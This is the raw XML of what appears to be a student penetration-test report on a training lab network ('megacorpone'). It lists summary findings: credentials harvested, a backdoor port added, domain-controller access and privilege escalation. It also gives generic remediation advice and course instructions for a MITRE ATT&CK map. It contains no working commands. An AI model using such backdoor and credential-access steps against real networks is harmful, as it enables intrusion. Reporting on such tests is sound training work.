    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Found unencrypted passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Added another port to backdoor back into the network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Got access to other users’ credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gained access of domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Log in as other users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run custom payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Escalate Pr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iviledges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The best way to avoid this is to prevent being exploited. There are a lot of vulnerabilities that is putting the company at risk. The best steps include updating software, removing information about the domain and employees from th</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e internet, updating passwords, creating unique ID’s, putting up firewalls, set up threat detectors, regularly pentest the system, encrypt data, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_3whwml4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_angoey2ntdo4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK Navigator Map</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 xml:space="preserve">[Using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Navigator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, build out a map showing what techniques you’ve used so far. To do so, on the MITRE ATT&amp;CK Navigator page, click “Create New Layer,” then “Enterprise,” and select each</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique that you’ve used. Change the color of each selected technique to highlight it in yellow if it was successful, or in red if it was unsuccessful, as the following image shows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1633855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2"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16"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1633855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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When you’re done, be sure to download the chart as JSON by clic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>king the download icon, as the following image shows:</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noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4826635" cy="12166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826635" cy="1216660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 xml:space="preserve">Remember, this report is not yet complete—we will finish it in the next module. </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 xml:space="preserve">The following completed MITRE ATT&amp;CK navigator map shows all of the techniques and tactics that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> used throughout the assessment.</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Legend:</w:t>
      </w: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Performed successfully</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Failure to perform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[MITRE ATT&amp;CK navigator map]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:r w:rsidRPr="00CB0356">
        <w:t>I marked things we did not try but learned about in blue.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0088310F" w:rsidRPr="00CB03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ibre Franklin Medium">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Mon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64B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BE83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2E7901"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D98EBD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031203D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D046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CE6873"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89AC2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8D1A83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71648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7B5569"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB661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B40B18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71CE6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060855"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C464CD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58227DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C964AD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71E74DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0C460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6D3E303B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24AE6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EC47FFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9EE2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7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1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0F"/>
    <w:rsid w:val="0088310F"/>
    <w:rsid w:val="00CB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CE714"/>
  <w15:docId w15:val="{04F98258-4490-CD43-B14C-E063ABE7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ivera@megacorpon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wDIaTVbfBMQyhqnYpsTeAEPFpNj3eTDTnXDg1l8D1x0/edit" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mcarlow@megacorpone.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google.com/document/d/1wDIaTVbfBMQyhqnYpsTeAEPFpNj3eTDTnXDg1l8D1x0/edit" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:msmith@megacorpone.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1wDIaTVbfBMQyhqnYpsTeAEPFpNj3eTDTnXDg1l8D1x0/edit" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mitre-attack.github.io/attack-navigator/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@megacorpon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grofield@megacorpone.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:thudson@megacorp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2023-04-23T00:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-23T00:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>